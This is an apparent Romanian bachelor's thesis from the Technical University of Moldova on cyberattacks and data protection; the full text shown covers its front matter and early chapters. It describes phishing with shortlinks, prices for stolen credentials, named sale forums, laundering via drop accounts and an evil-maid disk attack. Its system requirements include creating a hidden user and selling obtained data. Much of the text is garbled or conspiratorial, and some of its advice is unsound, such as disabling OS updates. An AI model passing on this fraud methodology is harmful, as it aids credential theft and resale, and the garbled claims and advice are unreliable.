Asistent univ. Rusu Cristian [626460]

2
Universitatea Tehnică a Moldovei

IDENTIFICAREA VULNER ABILITĂȚILOR ÎN
SISTEMELE INFORMAȚIO NALE ȘI
CONTRACARAREA LOR
IDENTIFY AND EXPLOAT ATION SISTEM FOR
OBTEIN DATA AND PROT ECT DATA

Student: [anonimizat]:
Asistent univ. Rusu Cristian

Chișinău 2020

3
Caiet de sarcini
Universitatea Tehnică a Moldovei
Denumirea facultății
Denumirea departamentului
Denumirea programului de studii
Aprob
Șef departament:
Nume Prenume, titlul științifico -didactic, titlul științific
_______________________ „_____”_____________ 2020
CAIET DE SARCINI
pentru proiectul/teza de licență al/a student: [anonimizat]
1.Tema proiectului/tezei de licență ________________________________________ ____________ _
confirmată prin hotărârea Consiliului facultății nr. ________ din „ __ ” ____________ _____2019
2.Termenul limită de prezentare a proiectului/tezei de licență „ ____ ” ___________ _______2020
3. Date inițiale pentru elaborarea proiectului/tezei de licență ___________________ ____________
______________________________________________________________________________ _____
4. Conținutul memoriului explicative
Introducere
Descrierea domeniului de studio
Modelarea și proiectarea sistemului prin diagrame
Realizarea experimentală a sistemului informațional
Evaluarea economica a sistemului informational
Concluzie
5. Conținutul părții grafice a proiectului/tezei de licență ____________________________
_____________________________________________________________________________ ______

4

Declarația student: [anonimizat] , declar pe propria răspundere că lucrarea de față este rezultatul
muncii mele, pe baza propriilor cercetări și pe baza informațiilor obținute din surse care au fost citate și
indicate, conform normelor etice, în note și în bibliografie. Declar că lucrarea nu a mai fost prezentată
sub această formă la nici o instituție de învățământ superior în vederea obținerii un ui grad științific sau
didactic.
Semnătura autorului _______________________________
Semnătura conducătorului de licență _________________

5
Rezumat
În cadrul lucrarii de licenta a fost elaborată o cercetare stiințifică ce este destinată utilizatorilor
simpli sau utilizatorilor avansați a sistemelor de operare și navigare prin mediul virtual. Scopul
cercetarii : evidențierea problemelor de securitatea in mediul virtual si instruierea utilizatorilor cu scopul
obținerii unor abilități de apă rare, profilaxie și contracarare a vulnerabilităților care extrag datele
utilizatorilor prin prizma vulnerabilităților existente și prin multitudiea de vulnerabilități umane
Reprezentarea și efectuarea reală a atacurilor cibernetice care aveau scopul de ev idenția
necalificare administratorilor de sistem, ne mai vorbind de simpli utilizatori sau chiar de utilizatorii
avansați fată de totalitatea de metode de expulzare a datelor cu scopul de a reprezenta problema
securității temporane și a propagandei că med iul online este cel mai securizat mediu și toți raufacătorii
sunt urmariți si predați judecății. Însă acest lucru nu este adevărat , mare majoritate a atacurilor
cibernetice rămin ne identificate și atacatorii ramîn la libertate. Scopul fiind protejarea ș i oferirea unor
soluții de protejare și profilaxie a utilizatorilor de orice nivel de la standart pînă la admini de servere
contra tuturor celor mai răspîndite metode si modele de exploituri

6
Abstract
Within the license work was developed a scientific research that is intended for the simple users
or the advanced users of the operating systems and navigation through the virtual environment. The
purpose of the research: to highlight the security problems in the virtual environment and to train the
users in order to obtain skills of defense, prophylaxis and counteracting the vulnerabilities that extract
the data of the users through the prism of the existing vulnerabilities and through the multi -study of
human vulnerabilities.
Repres entation and actual execution of cyber attacks aimed at highlighting the disqualification of
system administrators, not to mention simple users or even advanced users towards all methods of data
expulsion in order to represent the problem of temporary secu rity and propaganda that the environment
online is the most secure environment and all the perpetrators are watched and handed over to the trial.
But this is not true, the vast majority of cyber attacks remain unidentified and the attackers remain at
liberty. The purpose being to protect and offer solutions for the protection and prophylaxis of users of
any level from standard to server admissions against all the most widespread methods and models of
exploiters.

7
Cuprins
Introducere ………………………….. ………………………….. ………………………….. ………………………….. …………………….. 8
1 Descrierea domeniului ………………………….. ………………………….. ………………………….. ………………………….. …9
1.0 Importanța temei ………………………….. ………………………….. ………………………….. ………………………….. …… 10
1.1 Comparearea sistemelor ………………………….. ………………………….. ………………………….. ……………………… 11
1.2 El ementele ale managementului de proiect ………………………….. ………………………….. …………………………. 12
1.3 Elaborarea diagramei de context în IDEF0: ………………………….. ………………………….. ………………………… 13
1.4 Cerințele referitoare la sistem ………………………….. ………………………….. ………………………….. ………………. 14
Componența și conținutul lucrărilor de creare a sistemului ………………………….. ………………………….. …………. 16
1.5 Modulul de cercetare, verificare a datelor și validare a sistemului ………………………….. ……………………….. 16
2 Modelarea și Proiectarea siste mului ………………………….. ………………………….. ………………………….. ……………. 19
2.1 Modelarea funcțională a sistemului în notația IDEF0 ………………………….. ………………………….. ……………. 20
2.2 Parametri care trebuie respectați: ………………………….. ………………………….. ………………………….. ………….. 27
3 Descrierea comportamentală a sistemului . ………………………….. ………………………….. ………………………….. ……. 35
4 Realizarea sistemului ………………………….. ………………………….. ………………………….. ………………………….. …… 36
4.1 Exploatarea Activitățile și Intenturile ………………………….. ………………………….. ………………………….. …….. 50
4.2 Tipurile de obiecte ………………………….. ………………………….. ………………………….. ………………………….. … 52
4.3 Atacul activitaților expuse ………………………….. ………………………….. ………………………….. ………………….. 53
4.4 Intent Snifing Atack ………………………….. ………………………….. ………………………….. ………………………….. . 54
Сoncluzie ………………………….. ………………………….. ………………………….. ………………………….. ……………………… 72
Evaluarea Economică A Cercetării ………………………….. ………………………….. ………………………….. ……………… 62
Descrierea Experimentului Executat ………………………….. ………………………….. ………………………….. ……….. 63
Analiza Swot ………………………….. ………………………….. ………………………….. ………………………….. ………….. 63
Planul Calendarist ic a Cercetării ………………………….. ………………………….. ………………………….. …………….. 65
Calculul Indicatorilor Economici ………………………….. ………………………….. ………………………….. ……………. 66
Cheltuieli Privind Retribuirea Muncii ………………………….. ………………………….. ………………………….. ……… 67
Site UTM ………………………….. ………………………….. ………………………….. ….Ошибка! Закладка не определена.

8

Introducere
În acestă lucrare se vor lua în considerare toate metodele de obtinere și exploatare a datelor și în
ce scopuri datele preluate pot fi utilizate .
Încă din epoca antică a fost dezvoltat un mod de a proteja informația prin secretizarea acesteia.
Cel mai cun oscut algoritm a fost aplicat de împăratul Caesar pentru a proteja mesajele expediate. În
secolul XXI -lea la fel se protejează datele la fel prin metode de criptare , ele o ricum pot fi exploatate î n
scopuri malef ice, fiindcă î n prezent informația este putere și cel care deține informaț ia are contolul
asupra lumii din motiv ca ne află m la începutul erei ciberbetice.
La moment în secolul actual securitatea în mediu virtual este la nivel jos. Deși se face o
propagandă pasivă și invizibilă, iar cei mai ma ri propaganzi sunt FAANG, care in tim p real utilizează
toata informaț ia pe care o distriubuiți ca să controleze acti v viata utilizatorilor, manipulîndu -i pînă la
decizii reale în viaț a de zi cu zi .
Abia acum ci țiva ani în urmă sa început a pune accentul pe securitate din motivul liberului a cces
la resursele de securitate de genul ciberranges.org care invată cum de detectat o vulnerabilitate la orice
nivel și de exploatat pe ea, acest fapt a creat un “boom ”in cyberhacking mai ales in black hat oferind
posibilitatea de a se lărgi în masa abilitățile și resursele umane pe ntru a utiliza datele obținute î n urma
unui HAT în scopuri malefice. La moment sistemele contemporane au o mulțime de vulnerabilități din
motive de instruire proastă a mentorilor, lipsa accentului pus pe securitate din partea instituțiilor de
predare și intruire în toate domeniile începînd cu tehnologiile informaționale și terminînd cu
managementul informațional, astfel oric e nou angajat este dezorientat î n domeniul securității
informaționale și produsul automat în care este implicat angajatul este vulnerabil la cod injection.Un alt
motiv din cauza caruia sistemele contemporane sunt atît de vulnerabile pentru atacurile cibenernetice
este goa na dupa resurse financiare, în care ti mpul joaca cel mai mic rol pentru elaborare, principalul rol
aparținînd funcționalului pe care produsul trebuie să îl ofere, în cazurile date cel mai usor este de a
infiltra cod în produs pentru a obține acces la stația de lucru și la toate procesele de pe stație .
Cel mai des vulnerabilitățile sunt identificate prin încercarea de transmiterea unor parametri
invalizi sau chiar prin încercarea de injectare de cod in anumite segmente ale podusului tehnologic, iar
pentru aplicațiile tehnologice identificarea are loc prin intenturi care sunt niste segmente speciale care
au rolul de manipulare a actiunilor asupra datelor introd use sau primite de la server, mai sunt si așa
componente ca activity, în general activity s unt componente a aplicațiilor care afișează la ecran și din
care utilizatorii pot comunica cu scopul de a efectua careva acțiuni. Ca de regula aplicațiile sunt
compuse din mai multe activ ity, care sunt slab conectate î ntre ele. Deobicei o activity a aplica ției este
marcată ca principala, care este propusa utilizatorului la prima pornire a aplicației, la rîndul lui fiecare
activity poate porni o altă activity pentru a executa diferite acțiuni. Pentru ca activity să devină
accesibilă sistemul ui, pe ea trebui e de declarat î n fișierul manifest.xml , pentru acesta se declară
elementul <activity> în calitate de nod secundar pentru elementul <aplication>. Plus la acesta ,
elementul <activity> poate deasemen ea seta diferite filtruri la acț iuni cu ajutorul elementului intent –
filter pentru declararea unui sau altui element, ca alte componente a aplicației să poată activa operațiile.
La crearea aplicațiilor se declară operația standartă care are are filtru de intenții care declară
Activit y ca ceva standart sau default pentru rulare, această operație reacționează la executarea
procesului de bază. Astfel de filtru de intenții arată sub o astfel de formă <intent -filter> <action
android:name=”android.intent.action.Main”/> <category
android:name =”android.intent.actegory.Launcher”/> </intent -filter>

9
1 Descrierea domeniului

În lucrare se va cerceta obținerea ș i protecț ia datelor prin diferi te metode , iar fiecare metodă
reprezintă un pull mare de acțiuni complexe și fi ecare acțiune este caracterizat ă prin un set de pași
similar paș ilor pentru a instala un tool pe linux numai cu o complexitate mult mai mare.
Metodele prin care se pot obține datele deobicei toate sunt ilegale, în unele cazuri proprietarul le
oferă personal din motive incon stiente sau din cauza credulitații sale , cel mai des acest lucru se face
prin oferirea unei reclame, website, servciu, shortlink(bit.ly, ti.ny, cut.ly s.a.) cu textul priveste ai aparut
la noutați sau ceva similar de genul “Nu cumva ești tu aici ” și în spatele acestui link fiind un web server
ridicat pe masina virt ual-locală a atacatorului care în momentul accesării incărcă î n script prin browser
folosit un a numit tip de vulnerabilitate și obține toate datele necesare incepînd de la Nume, Prenume
reale pînă la date despre credentialele jertfei :
-datele cardului și contului bancar în preună cu parola de la web banking ;
-login și parolă la toate platformele de socializare și nu numai de la ele ;
-lista ult imelor cumpărături online din i storia navi garilor in mediul online ;
-lista tuturor aplicațiilor pe care le are instalate pe masina de lucru sau cea personală ;
-și pînă la î nregistrările audio în cazul că jertfa deține o funcție mare la serviciu .
Fiecare din aceste date se prelucreaza î n diferite moduri î n dependență de valoare lor, valoarea
fiind estimată prin numarul de web resurse pe care este înregistrată jertfa și dupa prezența în ele a
platformelor de vînzare, cumpărare și achitare produselor in mediul online, cercetarea acestor date și
aducerea la cunoștință va avea o valoare enorma in societate din motivul interității personale și limitării
exploatării omenirii prin reclama “target” și evidențierea faptului că securitatea oamenilor in mediu
virtul special este ascunsă și în unele caz uri este neglijată prin vinderea datelor de catre detinatorii
seriviciilor utilizate de diferite persoane in scopu l unor cercetăr i sau și mai rău.Toate cele menționat e
luate în considerare duc la faptul că liderii mondiali duc in eroare societatea contempo rană în scopului
unui profit estimat in valoare bănească .
Costul acestor date în general per unitate se evaluează in dolari și intervalul fiind de la 1$ pînă
la 50$ in cazul cardurilor de credit, însă in cazul accesului in panela da admin (login pass la pagina web )
la editare de content poate ajunge pînă la 500$ în unele cazuri și la 1000$ . Fiecare din aceste credențiale
se vînd pe diferite platforme la care orișicare din utilizatorii mediului virtual poate sa le procure sau să
dea comanda la spargerea un or date credențiale. Ca exemplu un account facebook in mediu costa 5$,vk
-50 rub,instagram ~ 100$ , admin panel – 5$, paypal 10$, amazon -10$, ebay – 10$, booking -20$ și în
general cam toate acestea variaza in acest interval doar că accesurile la in cabinet ul propriu al resurselor
web in marea majoritate costa sub 1$, aceste resurse nu sunt rentabile pentru procurare, astfel reise că
nimeni nu are necesitate in ele. Tipurile date de resurse pot fi procurate pe urmatoarele web
site:hhide.su, ww h-club.com, hho rd.org și alte bloguri închise sau deschise de acest gen.
Cel mai des metodele de obținere a acestor date au mai multe etape și mai multe cicluri , cele mai
utilizabile metode fiind ingineria socială prin fishing -spofing în ultima etapă se utilizează aceste metode
dar pînă atunci se strîng date din toate resusele publice, se începe un discurs introductiv la tema generală
și finsînd cu interesele jertfei, cele mentionate au loc prin fishing, însă in cazule ne targhetate se
folosesc exploituri pentru bro wser, stealer, criptor și un elf file.

10
1.1 Importanța temei
Principalul impact pe care îl are tema identificarea vulnerabilităților în sistemele informaționale
și contracararea lor este scoaterea la iveală problema manipulării cu oamenii prin metode la nivelul
inconștient prin cele mai ilegale metode, prin colecta re de date și ascultarea apelurilor telefonice, dar
chiar și a disutiilor în cercul prietenilor cînd telefonul este in buzunar.
Necătînd la faptul ca in 2013 a fost marele scandal cu Edward Snowdan cu privire la faptul că
agentiile naționale de securitate intercepteaza orice convorbiri și stîng toate datele despre date(metadata)
acest lucru doar pe jumătate de an sa oprit și apoi din nou sub altă denumire de operațiune procesul de
colectare a inceput. Acest lucru a fost demonstrat la o conferință de doi oam eni talentați
Nol și Engel au descoperit că ar putea determina turnați locația oricărui telefon mobil oferind o
astfel de funcție OKS -7 ca orice interogare de timp (ATI). Mai degrabă, ei ar putea face acest luc ru până
la începutul anului 2017 funcția a înc etat să mai existe. optimizat. Cu toate acestea, pentru a -și furniza
serviciile, toți operatori i trebuie să urmărească locația prin urmare, abonații OKS -7 au alte
funcții,perm ițând monitorizarea la distanță pentru ut ilizatori. Trebuie menționat că Comunicaț iile
celulare au eliminat în cea mai mare parte vulnerabile STI promulgată de Nol ș i Engel în cadrul
conferinței.
Vorbind la Congresul Mondial al hackerilor (Chaos Communic ation Congress), hackerul anual
conferințe la B erlin, Tobias Engel, fondatorul Sternraute, și Ka rsten Noll, lider științific co a spus un
lucrător la Security Research Labs că, folosind vulnerabilit atea SS -7, nu numai că determina locatia
abonatu lui retelei celulare in oricare luptă cu punctul lumii, dar și pentru a a sculta conversaț iile
telefonice riu. Și dacă nu put eți asculta conexiunea în modul în timp real, puteți înregistra o conversație
și tra nsferați Toate mesajele text sunt criptate. le decriptați.
De ce suntem cu aparen tă indiferenți la faptul că agenți a guvernamentală înreg istrează.
Vizualiza ză apelurile noastre telefonice, vizualizați e-mailurile noastre și chiar mesajele text . Probabil
motivul este că NSA are dureri în majoritatea cazur ilor nu afectează practic viața niciunul d intre noi, cel
puțin așa a fost vizibil, adică nu face nimic din ceea ce am simți.
Datorită urmări rii online a utilizatorilor din puteți afla ce cărți cumpărăm și care citim articole –
chiar și care părți ale articolelor le citim ne-a provocat cel mai mare interes. Pot vedea unde și cu cine
călătorim. Datorită urmăririi pe internet puteți înțelege dacă suntem bolnavi sau sănătoși, tr isti pentru
noi sau distractiv, asceti c sau preocupat sexual. Aproape toată supravegh erea de pe Internet este vizată
de banii p e datele primite.
Companii care ofera oam enilor servicii gratuite, cumva or reușesc să câștige din aceste servicii
gratui te miliarde de dolari rep rezintă o ilustrare excelentă a cât de profitabil este să colectăm cantități
mari de date despre utilizatorii de internet. C u toate acestea, sunt mai m ult o supraveghere orientată: din
parte a serviciilor speciale, străine nu și intern prin canvas fingerprint
Canvas fi ngerprinting – instrument de colectare date de pe Internet, ingenioase, dar geniul unor
astfel de lucruri un fel de inspirație de team ă.Can vasa fingerprint utilizează element canvas HTML5
pentru desen simplu imagine. Și asta este totul. Imaginea este creat ă în interior browser, dar nu o vedeți.
Procesul durează doar o fracțiune secunde, dar rezultatul acestuia este disponibil site -ului solici tant.
Ideea este că mediul software și hardware,care acționează ca resurse pentru bot -urile browserului vor
crea un ISO complet unic bătălia Apoi imaginea rezultată (aceasta poate fi o secvență de diferite fișe
multicolore gur) este convertit într -un număr unic, ceva de genul în cazul parolelor. În continuare, se
realizează o analiză care mai multe site -uri au obținut același număr folosind acest lucru tehnologie. Și
pe baza datelor obținute, puteți Înțelegeți ce site -uri vizitați Datorit la un anumit numă r sau „amprentă”,
site-ul care o solicită poate recunoaște browserul utilizatorului,

11
1.2 Comparearea sistemelor

Sistemul dat î n comparatie cu OWASP va prezenta mai mult atacuri in masă cu un range foarte
mare de persoane ,în general va fi prezentat atacurile asupra traficului de per soane din mai multe site
utilizâ nd mai multe softuri de navigare și scheme de exploatare a acestui traffic. Însă OWASP este un
sistem public care oferă doar guides si pe baza lor se face conferinte de securitate ș i nu prezinta
statistici reale despre exploatarea datelor și mai mult au scopul doar de testing și mai mult nimic ca
exemplu citeva din ocupațiile lor :
Testare OWASP
– proiectul de testare OWASP;
– principii de testare;
– tehnici de testare explica te;
– condiț ionarea testelor de securitate;
– teste de securitate integrate în dezvoltarea ș i testarea fluxurilor de lucru;
– analiza datelor de test de securitate.

Configura rea și dezvoltarea managementului testingului
– configurare rețea test / infrastructură ;
– configurarea platformei aplicației de testare ;
– testarea metodelor HTTP ;
– testarea securității transportului strict HTTP ;
– testarea politicii de domenii încrucișate RIA ;
– manipularea extensiilor fișierelor d e testare pentru informații sensibile ;
– examinați fișierele vechi, de rezervă și nereferente pentru informații sensibile .

Conform celor spuse toate sistemele existente nu oferă nici o protecție reală a contra atacurilor
cibenetice și nici metode de a crea propria tehnlogie de securitate la fel ea nu oferă nici o politică de
anonimitate sau cel puțin un guide cum sa devii invizibil
La etapa actuală de dezvoltare orice tehnologie care apare pe piața de tehnologii informaționale
are scopul de a monitor iza utilizatorii și de a obține cît mai multe date despre activitățile lor. Același
canvas fingerprint are funcția de a identifica utilizatorul și de al categoriza cu alți utilizatori prin functia
de hash care transformeaza imaginea un un numar – acest numa r este un identificator similar unei
amprente digitale. Toți sunt vulnerabili la asa tipuri de atacuri asistența curioasă în ce constă acest atac:
– păstrarea lucrurilor în numarul hotelului în care locuiești
– ieșirea înafara spațiului locativ a hotelului în diferite scopuri
– intrarea personalului în hotel (camera corespunzătoare)
– instalarea stikului in device
– instalarea extractorului de key
– extragerea și instalarea discului de memorie
– obtinerea key de securit atea o data cu logarea userului
prin acestă metoda este posibil de facut copie și de decriptat orice disk al oricarui hacker dar ce de mai
spus de un om de rînd sau a unui politician sau oricărei persoane de pe tot globul pămîntesc, ca urmare
reiese ca nimic și aproape nici o metodă la moment nu vă eschive ză de monitoringul mondial a ochiului
lui SHAURON a tot puternicul si nemărginutului BiG BROTHER care are scopul de a elimina sistemul
existent de oameni și de a introduce roboți, însa sistemul creat de area scopul de a scoate la iveală
metoda e eschivare de SHAURON prin modelarea în INET unei noi identități

12
1.3 Elementele ale managementului de proiect

Managementul de proiect este activitatea care implică cele patru funcții ale managementului în
conducerea unui proiect: planificarea, organizarea, control și îndrumare .
Planificare
În plan este de realizat un sist em informational care va evedenț ia problemele de securitate legate
de protecț ia datelor ș i combaterea acestor probleme . Primul pas constă î n evidențierea celor mai
fregvente atacuri cibern etice, al doilea pas consta în lucrul cu datele și in al tr eilea pas prezentarea unei
soluț ii de protectie a datelor
Lucrul cu datele consta evaluarea cantitatii volumului de material și calităț ii de material obținul
în caz ca meterialul este insuficein t el poate fi folosit ca o punte pentru a obține informația targetată , în
urma acestei acțiuni materialul este scos la vinzare pe platforme speciale, in cele mai dese cazuri
informația target este plasată doar pe platformă numai pentru persoanele excepti onale in care au
incredere și pot să le facă propune de procurare a acestei informației
Costurile pentru sistem vor fi variate. Se utilizeaz ă două calculatoare, un singur cercetator in
domeniul securită ții cibernetice și lumina. Calcu lator la preț de 12 mii de lei și lumină consumată de
calculator 60W/h, toate cheltuielile se dublează,iar salar iu provine din interes sportiv.
Organizarea
Echipa ce se ocupă de proiect este formată din o persoană . Aceasta persoană va lucra la partea
server și la nucleul și a doua parte consta din prelucrarea datelor obtinute .
Control
Dezvoltătorul singur o să-și pună sarcini, pentru rezolvare, legate de proiect de licență.
Îndrumarea
Dezvoltator ul vor lucra în fiecare zi câte 4 ore pe zi după perechile universitare. Ambii se vor
controla unul pe altul la ce nivel sunt și vor dezvolta componentele aplicației în mod nivelat.
Generali zări
Denumirea completă a sistemului și abrevierea: ”Identificarea vulnerabilitatilor sistemelor
informaționale și contarcararea lor”IVsic”
Denumirea organizației executoare și a beneficiarului, rechizitele lor: prin organizație
executoare se vor prezenta un student. Beneficiatul în cazul curent care învață este Universit atea
Tehnică din Moldova.
Lista documentelor în baza căror este creat sistemul: ghid de utilizare a sistemului
informatic, ghidul programatorului în care sunt evidențiate unele tehnologii utilizate și proiectarea
sistemului de bază și documentația explicit ă a sistemului informatic la nivel de cod.

Data de începere și finalizare a lucrăriilor: data de începere este de la 1 Septembrie 2019 pînă
pe data de 1 Mai 2020.

13
Informații despre surse și modalitatea de finanțare: în cazul dat finanțarea este interesul
sportiv și bursa de 600 -700 lei fiecare lună pe card ban car de la banca „Moldova Agroin bank”.
Ordinea de perfectare și prezentare a rezultatelor creării sistemului informațional, părților
sistemului sau a unor module separate: se va prezenta sistemul infor matic la nivel de concept, adica
se va concretiza posibilitățile funcționale ale sistemului, apoi se va prezenta sistemul la nivel fizic
conceptual, adica vor fi stabilite componentele ce vor forma sistemul și funcționalitățile lor. Apoi se va
prezenta fun cționalitățile sistemului etapizat concomitent și documentația ce ține de ghidul utilizatorului
și ghidul programatorului.
Descrirea generală a obiectului automatizării: sistemul informatic este realizat cu scopul de a
rezolva probleme complexe la care sun t răspunsuri fixate. De exemplu o poveste z care este redată de
cineva la un moment real și modelarea acestuia în timp real cu anumite imagini sau acțiuni pe ecran.
Determinarea misiunii și domeniului obiectiv de activitate a companiei: prin companie se va
subînțelege un grup format din 1 student cărui misiunea este de a implementa o cercetare stiințifică care
va oferi utilizatorilor un mecanism de rezolvare a problemelor personale și colective.
1.4 Elaborarea diagramei de context în IDE F0:

Subiectul modelării
Ca subiectul modelării este luat sistemul informațional ”IVsic” care este o cercetare în securitate
Scopul modelării
Pentru ce este nevoie de acest sistem?
Nevoia principală din c are am ajuns la acest subiect că tema pentru licentă este motivul de a lipsi
black hat de surse financiare pe care le folosesc î n aceleasi atacuri asu pra companiilor internationale ș i a
băncilor diferitor tari ,ca re în fine pagubeste economia și viața utilizatorilor atît in mediu real cît ș i
virtual .Cel mai des sunt furate datele credențiale , care mai apoi sunt prelucrate prin diferite acounturi
create tot cu datele furate ,cel mai des se creaza conturi bancare prin sisteme speciale care controlează in
ce bank persoana x are cont sau o alta metoda e ste utilizarea AEP care la fel se crează minim 10
accounturi pentru fiecare si prin ele are loc transferul de resurse și in final resurs ele pot fi scoase ca
white si fă ra probleme trimise pe conturi reale de paypal, amazon,ebanking și dropuri. Din cele
enumerate reise ca mai sunt alte scheme de utilizare a datelor s.a.m.d.
Obiectivele principale care sunt puse în această lucrare de licență sunt :
– de a evidenția problema protecț iei datelor personale cî t și corporative ;
– problema informării utilizatorilor p rotecț iei datelor ;
– complexitatea de explatare a sistemelor existente cu scopul de a obtine date .
Ce vom obține în finalul acestei cercetari?
O comunitate de oameni care se lupta cu cyberhacking!!!
Punctul de vedere
Viteza de dezvoltare a părții hard în calculatoare este f oarte mare și din motivul acesta este
foarte usor de exploatat orice sistem ce conț ine partea software ,chiar insă și sistemele hardware fiindcă
ele la la fel lucrează pe cod machine și toate acestea se poate de efectual datorita capacit aților mari a
PC-lor contemporane ce creste de an cu an iar nivelul de securitate pentru ele ramîne la acelasi

14
nivel,astfel reise la momentul actual să spargi un PC este foarte usor care la rîndul său se va transforma
în ID și prin intermediul lui se va e fectual atacuri asupra altor surse ,la rindul lor ele vor servi ca un
nivel de proxy.După logica existenta nu e greu de inteles că ID obținutela fel sunt prelucrate și sunt
copiate datele de pe PC infectate ,iar nici un antivirus nu va identifica acțiunil e ilegale asupra PC
infectate
Pentru a evita aceste acțiuni este necesar de a utiliza un set de reguli :
– de închis toate porturile neutilizate ;
– de restictionat accesul la tot numai prin WindowsNT ;
– de sters system manager pentru RDP ;
– de actuali zat BD la antivirus ;
– de închis actualizarile la Sistema de operare ;
– toate cookie sa fie puse in mod blok all cookies ;
– sa fie vpn conectat 24 /24 și fără vpn sa fie închisă conexiunea la Inet ;
– nici o data să nu fiți conectat sub zip curent ;
– disable flash și JavaScript .

Categoria activităților de automatizare: Sistemul va avea parte din categoria produselor ce
soluționează probleme de diferit gen. Ca exemplu aplic ației antidetectOS care izolează toate detalii
despre userul current , el fiind identificat numai in cazul î n care sunt poze pe HDD. A unei apli cații care
face loging la toate actiunile facute de user si înscrie în un file hiden toate ip la care sa conectat și ce
raspuns a venit de la ip -rile conectate și a unei sisteme de informati zare asemene a unui push
notification care î n caz de infectare să nu permită logarea cu datele credențiale începind cu login,pass
la rețele sociale pina la datele de CC sau DC ș.a.m.d sistema constind din mai multe tipuri de aplicații
anonimizare a ident ității: SRWare Iron ,ghostery,proxyfier,plinker,vbivotron, TrueCrypt , KeePassX .
– KeePassX – este o aplica ție gratuită cu licenț ă GPL pentru salvarea parolelor , aplicația are open
source cod și acest fapt esteideal din motivul posibilitații modificării aplicației și creării propriei
versiune a acestei aplicție.
Lista obiectivelor pentru care va fi utilizat sistemul: sistemul va oferi posibilitatea de a securiza
datele atît a uti lizatorilor și cele corporative , va fi lipsit de propaganda ideologică propus ă de FAANG și
de alte companii mai mici ca toate datele lor la care ei au dat consimțămintul sunt protejate ideal și
nimeni niciodată nu le va utiliza în scopuri malefice, mai ales inc azurile de GSM sau GPS traking sau și
mai des î n gestionarea cu banii pe conturile proprii.
1.5 Cerințele referitoare la sistem

În partea dată a sarcinii tehnice se va descrie detaliat cerințele tehnice și funcționale ale
sistemului implementat. Cerințele tehnice se împart la rîndul lor în cerințe hardware și cerințe software.
În cerințele hardware vor fi enumerate și specificate toate necesitățile minime hard pentru ca
sistemul să poată oferi toate funcțiile sale într -un mod normal de lucru.

15
Cerințele software includ o enumerare de sisteme de operare necesare pentru ca sistemul
specificat în lucrarea dată să aibă acces la parte a hardware și funcționalitățile calculatorului.
Cerințele tehnice
Hardware:
– CPU Dual -Core 1.5 GHz ;
– GPU Integrat ori Discretă de la Intel HD 3000 ;
– RAM 1GB – HDD 120GB ;
– Wifi – Resolution minim : 640×480 – CD-ROM ;
– DirectX 9.0+ – Microsoft ;
Soft:
Win 7+ sau Kali Linux Sana 2 + ;
– Java JDK 8 ;
– Gradle 2.0+ ;
– MySQL sau Postgresql 10+ ;
-Python3.7 ;
-Ruby ;
-C, C++;
Cerințe funcționale:
-trimiterea datelor catre un host anumit ;
– primirea r ăspunsului în formă de request ;
– scanarea porturilor active ;
– scanarea versionilor la nivel de soft ;
– acces la nivel software și hardware pe diferite hosturi ;
– crearea unui user ascuns ;
Cerințe nonfuncționale:
– analizarea datelor primite ;
– procesarea datelor primite ;
– descifrarea literelor ;
construirea cuvintelor ;
– analizarea cuvintelor primite ;
– verificarea acestora pentru veridicitate ;

16
– controlul sistemelui ;
– îngeristrarea accounturilor cu datele primite ;
– vinderea datelor primite pe platforma specială ;
– cercetarea curateții hostului current;
– cercetarea la antifrod ;
– prelucrarea timpului current .
Componența și conținutul lucrărilor de creare a sistemului

Lista stadiilor și a etapelor: prima stadie va fi realizarea sistemului la nivel conceptual. Se va
determina funcționalitățile sistemului la nivel de soft . Următoarea se va implementa toate
funcționalitățile pe partea server și client. Testarea și propunearea soluțieide contracarare prin un guide
special pentru utilizator .
Termenii de execuție: termenii de execuție depinde de fiecare etapă (stadie) în parte. Pentru
proiectare se va aloca 2 -4 săptămâni. Pentru implementare 3 -4 luni și rămâne documentația și testarea
care va cuprindea ultimele etape a sistemului si ultimul timp rămas.
Lista orga nizațiilor executoare: prin organizație se va lua în vede un grup format din un
student. Un student va realiza partea server și client a cercetarii SI .

1.6 Modulul de cercetare, verificare a datelor și validare a sistemului

Tipurile, componența, volumul și metodele de cercetare :
Se vor utiliza următoarele tehnici de exploatare și testare, din motiv unei complexitați mare al
atacurilor vor fi prezentate mai multe modele de testare si exploatare.
Functional testing
Testar e de tip black box – Canalizată pe verificarea cerintelor funcționale ale aplicaț iei; acest tip
de testare trebuie fă cut de testeri. Asta nu inseamnă că programatorii nu ar trebui să iș i verifi ce codul
(asta fireste se aplică oricarui stadiu al testă rii).
Black box testing – Nu se bazează pe cunoasterea internă a design -ului sau a codului . Testele
sunt bazate pe cerinț e și funcț ionalitate
White box testing – Se bazează pe cunoasterea l ogicii interne a codului aplicaț iei. Testele sunt
bazate pe acoper irea s intaxei de cod, ramuri, căi, condiții
Testarea Funcțională
Unit testing – Prima treaptă a testării ; se testează funcțiile sau m odule de cod . De obicei sunt
făcute de progr amatori deoarece presupun cunostinț e avansate a design -ului intern al aplicației ș i
codului. Nu intotd eauna sunt usor de executat dacă aplicația nu are o arhitectură bine pusă la punct;
poate presupune dezvoltarea de drivere sau stub -uri

17
Integration testing – Testarea combinata a diferitelor părți dintr -o aplicație pentru a vedea dacă
functionează corect. Aceste "parți" pot fi module de cod, aplicații individuale, aplicaț ii client -server intr –
o retea etc.
System testing testare de tip black -box bazată pe specificații care acoperă toate parț ile
sistemului.
User acceptance testing deter mină dacă software -ul este satisfacator pentru un end -user sau
client.
Usability testing – Testarea daca un software este "user -friendly". Evident această testare este
subiectivă ș i va depinde de utilizatorul sau clientul vizat. Interviuri cu utilizatorii , survey -uri,
monitorizarea sesiunilor utilizatorilor sunt metode care pot fi folosite. Programatorii ș i testerii n u sunt
cei mai indicaț i pentru acest tip de testare.
Install/u ninstall testing – testarea parțială sau integrală a procesului de instalare s au upgrade.
End-to-end testing – similar cu system testing; este testare de nivel 'macro' ; presupune testarea
aplicatiei in mediul in care va fi folosita.

Sanity testing or smoke testing – de obicei, un efort de testare inițial pentru a determina dacă o
nouă versiune de software funcționează destul de bine să -l accepte pentru un efort de testare majore. De
exemplu, în cazul în care software -ul nou se prăbușe ște sistemele la fiecare 5 minute, bogging jos
sisteme la un crawl, sau baze de date corupătoare, software -ul nu poate fi într -o stare destul de "sănătos"
pentru a justifica teste suplimentare în starea sa actuală
Regression testing – re-testare după reme dieri sau modificări ale software -ului sau a mediului
său. Poate fi dificil să se determine cât de mult este nevoie de re -testare, în special în apropierea de
sfârșitul ciclului de dezvoltare. instrumente automate de testare pot fi utile în special pentru acest tip de
testare.
Acceptance testing – Testarea finală pe baza specificațiilor utilizatorului final sau client, sau pe
